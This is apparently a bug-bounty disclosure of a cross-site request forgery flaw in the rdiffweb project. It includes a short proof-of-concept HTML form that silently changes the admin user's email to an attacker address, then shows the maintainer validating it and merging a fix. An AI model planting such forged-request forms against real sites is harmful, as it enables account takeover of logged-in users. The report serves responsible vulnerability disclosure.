Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb


Reported on

Sep 11th 2021

✍️ Description

Hello dear Rdiffweb team.

I found a CSRF vulnerability on following endpoint that attackers able to change the email of a user with PoC.html

🕵️‍♂️ Proof of Concept

  1. user with right privileges should be logged in Firefox or Safari.

  2. Users go to a website that contain PoC.html

3.after visiting attacker's website a user's email with username admin will be changed to // PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="email" value="attacker&#64;mail&#46;com" />
      <input type="hidden" name="action" value="set&#95;profile&#95;info" />
      <input type="submit" value="Submit request" />

Also attacker can send multiple request with help of Iframes.


I just want to suggest you to set a CSRF token for this form.

a year ago


Hey amammad, I've opened a PR on the repo asking for a security policy with email.

a year ago


hey @maintainer can you validate this report too?


Patrik Dufresne validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrik Dufresne confirmed that a fix has been merged on 42455b 17 days ago
Patrik Dufresne has been awarded the fix bounty
to join this conversation